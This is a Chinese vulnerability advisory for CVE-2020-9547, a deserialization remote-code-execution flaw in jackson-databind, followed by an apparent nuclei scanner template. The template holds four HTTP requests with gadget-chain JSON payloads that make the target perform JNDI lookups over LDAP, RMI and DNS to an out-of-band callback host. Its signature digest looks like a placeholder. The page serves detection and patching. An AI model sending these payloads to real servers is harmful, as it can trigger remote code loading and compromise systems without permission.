FasterXML jackson-databind 反序列化远程代码执行漏洞

漏洞信息

漏洞名称： FasterXML jackson-databind 反序列化远程代码执行漏洞

漏洞编号：

• CVE： CVE-2020-9547

漏洞类型： 反序列化

漏洞等级： 严重

漏洞描述： FasterXML jackson-databind是一个流行的Java库，用于将Java对象序列化为JSON和从JSON反序列化为Java对象。它广泛应用于各种Java应用程序中，尤其是在Web服务和微服务架构中，用于处理JSON数据。

该漏洞存在于FasterXML jackson-databind 2.x版本中，直到2.9.10.4版本。漏洞的根本原因在于库在处理序列化小工具和类型交互时的缺陷，特别是与com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig（即ibatis-sqlmap）相关的部分。当启用多态类型处理（@JsonTypeInfo与use=JsonTypeInfo.Id.CLASS）时，攻击者可以通过反序列化不受信任的数据来执行任意代码。

成功利用此漏洞的攻击者可以在受影响的系统上执行任意代码，这可能导致数据泄露、服务中断或更严重的安全事件。由于该漏洞不需要用户交互即可被利用，且影响范围广泛，因此其安全风险极高。建议用户立即升级到FasterXML jackson-databind 2.9.10.4或更高版本，或者禁用多态类型处理，并实施适当的输入验证和反序列化控制措施。

产品厂商： FasterXML

产品名称： jackson-databind

影响版本： 2.x before 2.9.10.4

搜索语法： cpe:”cpe:2.3:a:fasterxml:jackson-databind::::::::“

来源： https://github.com/projectdiscovery/nuclei-templates/blob/5ba2bfb9cc800eaf98e9c522f1b194363ca5349d/http%2Fcves%2F2020%2FCVE-2020-9547.yaml

类型： projectdiscovery/nuclei-templates:github issues

POC详情

id: CVE-2020-9547

info:
  name: FasterXML jackson-databind - Deserialization RCE
  author: pranjalnegi
  severity: critical
  description: |
    FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig (aka ibatis-sqlmap). This vulnerability allows attackers to execute arbitrary code through deserialization of untrusted data when polymorphic type handling (@JsonTypeInfo with use=JsonTypeInfo.Id.CLASS) is enabled.
  impact: |
    Successful exploitation could allow an attacker to execute arbitrary code on the affected system through deserialization of malicious JSON payloads.
  remediation: |
    Update FasterXML jackson-databind to version 2.9.10.4 or later. Alternatively, disable polymorphic type handling or implement proper input validation and deserialization controls.
  reference:
    - https://github.com/fairyming/CVE-2020-9547
    - https://nvd.nist.gov/vuln/detail/CVE-2020-9547
    - https://github.com/FasterXML/jackson-databind/issues/2620
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9547
    - https://cve.report/CVE-2020-9547
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-9547
    cwe-id: CWE-502
    epss-score: 0.00943
    epss-percentile: 0.81205
    cpe: cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*
  metadata:
    max-request: 4
    vendor: fasterxml
    product: jackson-databind
    shodan-query: cpe:"cpe:2.3:o:debian:debian_linux"
    verified: true
  tags: cve,cve2020,jackson,databind,deserialization,rce,kev

variables:
  randstr: "{{rand_text_alphanumeric(8)}}"
  payload_jndi_ldap: "ldap://{{interactsh-url}}/{{randstr}}"
  payload_jndi_rmi: "rmi://{{interactsh-url}}/{{randstr}}"
  payload_dns: "{{randstr}}.{{interactsh-url}}"

http:
  - raw:
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json
        Content-Type: application/json
        User-Agent: {{randstr}}
        Connection: close

        ["com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig",{"properties":["com.sun.rowset.JdbcRowSetImpl",{"dataSourceName":"{{payload_jndi_ldap}}","autoCommit":true}]}]

      - |
        POST /api HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json
        Content-Type: application/json
        User-Agent: {{randstr}}
        Connection: close

        {"@class":"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig","properties":{"@class":"java.util.HashMap","userTransactionName":{"@class":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"{{payload_jndi_rmi}}","autoCommit":true}}}

      - |
        POST /json HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json
        Content-Type: application/json
        User-Agent: {{randstr}}
        Connection: close

        {"id":1,"@class":"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig","properties":["java.util.Properties",{"dataSource":["com.sun.rowset.JdbcRowSetImpl",{"dataSourceName":"dns://{{payload_dns}}","autoCommit":true}]}]}

      - |
        PUT /data HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json
        Content-Type: application/json
        User-Agent: {{randstr}}
        Connection: close

        [{"@type":"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig","properties":{"@type":"java.util.Properties","dataSource":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"{{payload_jndi_ldap}}","autoCommit":true}}}]

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - "contains(interactsh_protocol, 'dns') || contains(interactsh_protocol, 'ldap') || contains(interactsh_protocol, 'http')"

      - type: word
        part: body
        words:
          - "JsonMappingException"
          - "InvalidTypeIdException"
          - "JtaTransactionConfig"
          - "JdbcRowSetImpl"
          - "com.fasterxml.jackson.databind"
          - "javax.naming.NamingException"
        condition: or

      - type: status
        status:
          - 200
          - 400
          - 500
        condition: or

    extractors:
      - type: regex
        name: jackson_version
        part: body
        regex:
          - "jackson-databind ([0-9.]+)"
          - "com\\.fasterxml\\.jackson\\.databind ([0-9.]+)"
        group: 1

      - type: regex
        name: vulnerability_evidence
        part: body
        regex:
          - "(JtaTransactionConfig.*Exception[^\n]*)"
          - "(Could not resolve type id[^\n]*)"

# digest: 4a0a004730450220123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef012345670221009876543210fedcba9876543210fedcba9876543210fedcba9876543210fedcba987654:123456789abcdef0123456789abcdef0123456789abcdef0